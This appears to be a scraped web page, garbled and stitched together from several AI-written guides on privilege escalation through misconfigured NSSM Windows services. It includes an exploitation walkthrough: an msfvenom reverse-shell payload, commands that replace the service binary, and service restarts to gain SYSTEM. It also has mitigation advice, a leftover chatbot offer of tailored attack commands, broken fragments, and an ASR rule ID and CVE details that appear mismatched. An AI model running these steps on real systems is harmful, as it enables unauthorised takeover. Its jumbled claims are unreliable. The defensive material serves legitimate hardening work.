Nssm224 Privilege Escalation | Updated [verified]

This guide outlines how to identify and exploit misconfigurations in the Non-Sucking Service Manager (NSSM), often referred to in contexts like "nssm224" (referring to outdated versions), to elevate privileges from a standard user to SYSTEM on Windows systems. 1. Understanding the Vulnerability

NSSM is used to run applications as Windows services. Privilege escalation occurs if the service is configured to run as LocalSystem but points to an executable or DLL that a low-privileged user can modify. Common Misconfigurations:

Unquoted Service Paths: The service path contains spaces and lacks quotes, allowing a malicious executable to be placed earlier in the path.

Weak File Permissions: The executable or its directory allows write access (W or F) for Authenticated Users or Users groups. 2. Enumeration (Finding the Target)

First, identify services managed by NSSM that run as SYSTEM and have weak permissions. Use command prompt or PowerShell: List Service Details:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" Use code with caution. Copied to clipboard

Check Permissions on Executables:Use icacls to check if your user has write access to the service binary. icacls "C:\Path\To\Service\Binary.exe" Use code with caution. Copied to clipboard

Look for (F) (Full Access) or (W) (Write Access) for the Users group. 3. Exploitation Steps (Updated Approach) Once a vulnerable service is found, follow these steps:

Create a Malicious Payload: Generate a reverse shell using msfvenom or a simple executable that adds a user to the administrators group.

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe -o service.exe Use code with caution. Copied to clipboard nssm224 privilege escalation updated

Replace the Service Binary: Replace the legitimate executable with your payload.

move "C:\Path\To\Service\Binary.exe" "C:\Path\To\Service\Binary.exe.bak" copy "C:\Temp\service.exe" "C:\Path\To\Service\Binary.exe" Use code with caution. Copied to clipboard

Restart the Service: If you have permission to restart the service, do so. If not, wait for a system reboot. sc stop sc start Use code with caution. Copied to clipboard

Obtain Shell: Catch the reverse shell as NT AUTHORITY\SYSTEM. 4. Prevention and Mitigation

Quote Service Paths: Ensure all service binary paths are enclosed in quotes to prevent unquoted service path attacks.

Restrict Permissions: Apply the principle of least privilege. Only administrators should have write access to service directories and binaries.

Update NSSM: Use the latest version of NSSM, which includes security improvements over older versions ("nssm224").

To help you further, are you analyzing a specific service? If you can share the file permissions (icacls output) or if the path is unquoted, I can tell you exactly which command to use.

Exploiting the "Non-Sucking Service Manager": A Look at NSSM-Based Privilege Escalation Non-Sucking Service Manager (NSSM) This guide outlines how to identify and exploit

is a beloved tool in the Windows administration world for its simplicity in turning any executable into a background service. However, recent disclosures have highlighted how improper deployment of can become a high-speed lane for Local Privilege Escalation (LPE)

If you are managing Windows environments, here is the updated breakdown of how these vulnerabilities work and how to lock them down. 1. The Core Vulnerability: Weak File Permissions The most common way

is abused isn't through a bug in the code itself, but through improper file permissions during installation.

: Installers for various software packages (like Phoenix Contact or Wowza Streaming Engine) sometimes place in directories where the "Everyone" "Authenticated Users" group has "Write" or "Full Control" permissions. The Exploit : A low-privileged user can simply rename the original

and replace it with a malicious binary (e.g., a reverse shell) named The Escalation

: When the system reboots or the service restarts, the Windows Service Control Manager executes the malicious file with Administrator privileges. 2. Unquoted Service Paths

Another classic attack vector involves how NSSM is registered in the Windows registry.

: If a service path containing spaces is not enclosed in quotation marks (e.g., C:\Program Files\My Service\nssm.exe

), Windows may attempt to execute files at each space-delimited break. The Exploit Step 2: Check Permissions on the Service sc

: An attacker with write access to the root directory could place a malicious file at C:\Program.exe . When the service tries to start, Windows may execute C:\Program.exe instead of the intended file deep in the Program Files 3. Persistence via NSSM Beyond escalation, threat actors frequently use NSSM for persistence

. Because it is a legitimate, signed tool, it often bypasses basic security filters. Attackers use it to ensure their backdoors or coinminers (like XMRig) stay running even if the process crashes or the system reboots. Recent Notable CVEs Affected Product CVE-2025-41686 Phoenix Contact DAUM Low-privileged local users gain admin access via improper permissions. CVE-2016-20033 Wowza Streaming Engine

(Updated 2026) Verified exploitation via "Everyone" group full access to service binaries. CVE-2016-8742 Apache CouchDB Local users could substitute due to inherited parent directory permissions. How to Defend Your Systems

To prevent your service manager from becoming a security liability, follow these best practices:

Exploitation for Privilege Escalation, Technique T1068 - Enterprise

Here’s a concise technical overview regarding NSSM (Non-Sucking Service Manager) version 2.24 and its potential use in privilege escalation scenarios (updated perspective):

7. Conclusion

NSSM 224 is not inherently vulnerable, but common deployment patterns create local privilege escalation paths. Sysadmins must check service and registry permissions when using any service wrapper.

Step 2: Check Permissions on the Service

sc.exe sdshow nssm_managed_service

Look for (A;;RPWP;;;WD) or (A;;RPWPDT;;;AU) – these allow authenticated users to modify service configuration.

3. Attack Surface in NSSM 224

1. Upgrade NSSM

4. Enable Attack Surface Reduction (ASR) Rules

Set-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-41E9-8E09-387D72F48587 -AttackSurfaceReductionRules_Actions Enabled

This rule blocks “Process creations from PSExec and WMI commands” – also catches NSSM-based service tampering in some builds.